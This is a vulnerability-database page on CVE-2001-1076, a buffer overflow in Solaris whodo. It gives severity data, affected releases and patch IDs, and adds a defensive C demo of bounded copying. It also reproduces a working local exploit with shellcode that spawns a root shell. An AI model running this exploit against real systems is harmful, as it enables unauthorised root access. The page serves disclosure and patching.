CVE-2001-1076
CVSS 7.2
Published: 2001-07-05 00:00:00
Revised: 2008-09-10 15:09:37

[Original] Buffer overflow in whodo in Solaris SunOS 5.5.1 through 5.8 allows local users to execute arbitrary code via a long (1) SOR or (2) CFIME environment variable.


[CNNVD] Solaris whodo Buffer Overflow Vulnerability (CNNVD-200107-053)

        whodo in Solaris SunOS 5.5.1 through 5.8 contains a buffer overflow. A local user can execute arbitrary code via an overly long (1) SOR or (2) CFIME environment variable. Note that the variable spelled "CFIME" in the CVE text is set as CFTIME by the exploit reproduced further down this page; CFTIME is the Solaris locale variable that controls date/time formatting.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [can take the whole system down]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.5
cpe:/o:sun:sunos:5.5.1 (Sun Microsystems Solaris 2.5.1)
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:8.0::x86
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:sunos:5.8 (Sun SunOS 5.8, the Solaris 8 release)
cpe:/o:sun:sunos:5.7 (Sun Microsystems Solaris 7)
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sun:solaris:2.5.1

- OVAL (technical detection details)

oval:org.mitre.oval:def:47 Solaris 8 whodo Buffer Overflow Vulnerability
oval:org.mitre.oval:def:34 Solaris 7 whodo Buffer Overflow Vulnerability
*OVAL describes in detail how to detect this vulnerability; see the OVAL definitions above for the technical details of the check.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1076
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1076
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-053
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/2935
(VENDOR_ADVISORY)  BID  2935
http://archives.neohapsis.com/archives/bugtraq/2001-07/0076.html
(VENDOR_ADVISORY)  BUGTRAQ  20010705 Solaris whodo Vulnerability
http://xforce.iss.net/static/6802.php
(VENDOR_ADVISORY)  XF  solaris-whodo-bo(6802)

- Vulnerability Information

Solaris whodo Buffer Overflow Vulnerability
High severity; buffer overflow
2001-07-05 00:00:00 2005-10-20 00:00:00
Local
        whodo in Solaris SunOS 5.5.1 through 5.8 contains a buffer overflow. A local user can execute arbitrary code via an overly long (1) SOR or (2) CFIME environment variable.

- Advisories and Patches

        Patches are available for Sparc and Intel versions of Solaris.

  • Sun Solaris 8_x86: Sun 111827-01
  • Sun Solaris 8: Sun 111826-01
  • Sun Solaris 2.5: Sun 111838-01
  • Sun Solaris 2.5_x86: Sun 111839-01
  • Sun Solaris 2.5.1_x86: Sun 111841-01
  • Sun Solaris 2.5.1: Sun 111840-01
  • Sun Solaris 2.6: Sun 111859-01
  • Sun Solaris 2.6_x86: Sun 111860-01
  • Sun Solaris 7.0: Sun 111600-01
  • Sun Solaris 7.0_x86: Sun 111601-01

        On these releases, showrev -p lists the installed patches; confirm the fix by looking for the patch ID matching your release and architecture (a later revision of the same patch, such as -02, also contains it).

- Vulnerability Information (20974)

Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability (EDBID:20974)
Platform: solaris; type: local
2001-06-01, Verified
Author: Pablo Sor
source: http://www.securityfocus.com/bid/2935/info

The 'whodo' utility shipped with Sun Microsystems' Solaris provides a listing of users online and their activities. It is installed setuid root because it reads from the 'utmp' log as well as from the process table.

'whodo' contains a buffer overflow which can be exploited to gain root privileges. The overflow is triggered through environment variables (SOR and CFTIME in the exploit below), which any local user controls when invoking the setuid binary, so whatever runs after the overwritten return address executes with whodo's root privileges.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
   /usr/sbin/i86/whodo overflow proof of concept.

   Pablo Sor, Buenos Aires, Argentina 06/2001
   psor@afip.gov.ar, psor@ccc.uba.ar

   works against x86 solaris 8

   default offset +/- 100  should work.

   Editor's note: the CVE text names the second variable "CFIME"; the
   code sets CFTIME, the Solaris locale variable whodo actually reads.
*/

/* Return the current stack pointer. 32-bit x86 only: it relies on the
   value left in %eax being taken as the return value. */
long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{

/* Solaris/x86 shellcode: seteuid(0), setuid(0), then execve("/bin/sh")
   via the lcall $7,$0 system call gate. Contains no NUL bytes. */
char shell[]=
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff";

  /* Guessed address of the NOP sled placed in the SOR variable. */
  unsigned long magic = get_esp() + 1180;  /* default offset */

  unsigned char buf[800];
  char *env;

  /* SOR: a 400-byte NOP (0x90) sled with the shellcode at offset 160.
     Landing anywhere in the sled runs the shellcode. */
  env = (char *) malloc(400*sizeof(char));
  memset(env,0x90,400);
  memcpy(env+160,shell,strlen(shell));
  memcpy(env,"SOR=",4);
  env[399]=0;   /* terminate SOR (the original wrote buf[399]=0 here, leaving env unterminated) */
  putenv(env);

  /* CFTIME: 800 bytes of filler with the guessed address at offset 271,
     where it overwrites the saved return address in whodo's stack frame. */
  memset(buf,0x41,800);
  memcpy(buf+271,&magic,4);
  memcpy(buf,"CFTIME=",7);
  buf[799]=0;
  putenv((char *)buf);

  /* Run the setuid binary with the poisoned environment; if the offset
     is right, the shell it spawns is root. */
  system("/usr/sbin/i86/whodo");
  return 0;
}
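The page does not reproduce whodo's source, so the following is an added illustration, written for this page and not Sun's code, of the bug class the advisory describes: a setuid-root program copies an attacker-controlled environment value into a fixed-size buffer without consulting the buffer's size. The buffer size FMT_MAX, the default format DEFAULT_CFTIME and the function names are assumptions; the 800-byte value is constructed to match the CFTIME payload length in the exploit above. The unbounded copy is written into an oversized scratch buffer so the demonstration itself does not crash, and the bounded variant rejects an oversized value outright rather than truncating it, because a silently cut-off locale format would change what the program prints.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the program's local buffer for the format string; the
   real size inside whodo is not given on this page. */
#define FMT_MAX 64

/* Assumed default used when CFTIME is unset or rejected. */
#define DEFAULT_CFTIME "%c"

/* Vulnerable shape. The destination size is available but ignored, which
   is exactly what strcpy(dst, src) does. Returns the number of bytes
   written (terminator included) so a caller can see how far past dstsize
   the write went. Only call it with a dst large enough to hold src: the
   point is to show the missing length check, not to corrupt memory. */
size_t unbounded_copy(char *dst, size_t dstsize, const char *src)
{
    (void)dstsize;                 /* the bug: the size is never consulted */
    size_t n = strlen(src) + 1;
    memcpy(dst, src, n);           /* same effect as strcpy(dst, src) */
    return n;
}

/* Hardened shape. Refuses any value that would not fit, terminator
   included, and returns -1 so the caller can fall back to a default. */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    if (dstsize == 0 || n >= dstsize)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* What a setuid tool should do with an environment-supplied format: treat
   it as untrusted input, bound it, and fall back when it is too long.
   env_value is the result of getenv("CFTIME"), passed in so the logic can
   be exercised without touching the real environment. Returns 0 when the
   caller's value (or the default, if unset) was installed, -1 when a
   caller-supplied value was rejected and the default installed instead. */
int load_cftime(const char *env_value, char *out, size_t outsize)
{
    if (env_value != NULL && bounded_copy(out, outsize, env_value) == 0)
        return 0;                  /* fits: accepted as given */
    if (bounded_copy(out, outsize, DEFAULT_CFTIME) < 0)
        return -1;                 /* not even the default fits */
    return env_value == NULL ? 0 : -1;
}

/* Constructed attacker value: the same 800-byte length as the CFTIME
   payload in the exploit above, filled with 'A' instead of an address. */
char *make_long_value(size_t len)
{
    char *p = malloc(len + 1);
    if (p == NULL)
        return NULL;
    memset(p, 'A', len);
    p[len] = '\0';
    return p;
}

int main(void)
{
    char scratch[1024];            /* oversized on purpose; see unbounded_copy */
    char fmt[FMT_MAX];
    char *evil = make_long_value(800);
    if (evil == NULL)
        return 1;

    size_t wrote = unbounded_copy(scratch, FMT_MAX, evil);
    printf("unbounded copy: %zu bytes into a %d-byte slot, %zu past the end\n",
           wrote, FMT_MAX, wrote - FMT_MAX);

    /* The same value through the hardened path, then the real environment. */
    printf("bounded copy of the 800-byte value: %s\n",
           load_cftime(evil, fmt, sizeof fmt) == 0 ? "accepted" : "rejected, default kept");
    printf("CFTIME from the environment: %s (\"%s\")\n",
           load_cftime(getenv("CFTIME"), fmt, sizeof fmt) == 0 ? "accepted" : "rejected",
           fmt);

    free(evil);
    return 0;
}
```

Run it once with CFTIME unset and once with CFTIME set to a long string (for example 800 characters); the unbounded path reports writing 737 bytes past a 64-byte slot, while the bounded path keeps the default. The same shape applies to the SOR variable: anything read with getenv() in a setuid program is attacker input and needs the same check before it touches a fixed-size buffer.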
		

- Vulnerability Information

8697
Solaris whodo Multiple Variable Local Overflow
Input Manipulation
Loss of Integrity

- Vulnerability Description

- Timeline

2001-06-01 Unknown
2001-06-01 Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Solaris whodo Buffer Overflow Vulnerability
Class: Boundary Condition Error; BID 2935
Remote: No; Local: Yes
2001-07-05 12:00:00 2009-07-11 06:56:00
Discovered by Pablo Sor <psor@afip.gov.ar>.

- Affected Program Versions

Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5

- Vulnerability Discussion

Same text as the discussion under the EDBID 20974 entry above: whodo is installed setuid root because it reads utmp and the process table, and it contains a buffer overflow exploitable for root privileges.

- Exploit

An exploit written by Pablo Sor <psor@afip.gov.ar> is available; it is reproduced under the EDBID 20974 entry above.

- Solution

Patches are available for Sparc and Intel versions of Solaris; the per-release patch IDs are the same as those listed in the advisories and patches section above.


Sun Solaris 2.6
  • Sun 111859-01


Sun Solaris 7.0
  • Sun 111600-01


Sun Solaris 8_x86
  • Sun 111827-01


Sun Solaris 2.6_x86
  • Sun 111860-01


Sun Solaris 8_sparc
  • Sun 111826-01


Sun Solaris 2.5
  • Sun 111838-01


Sun Solaris 7.0_x86
  • Sun 111601-01


Sun Solaris 2.5_x86
  • Sun 111839-01


Sun Solaris 2.5.1 _x86
  • Sun 111841-01


Sun Solaris 2.5.1
  • Sun 111840-01

- Related References

 

 
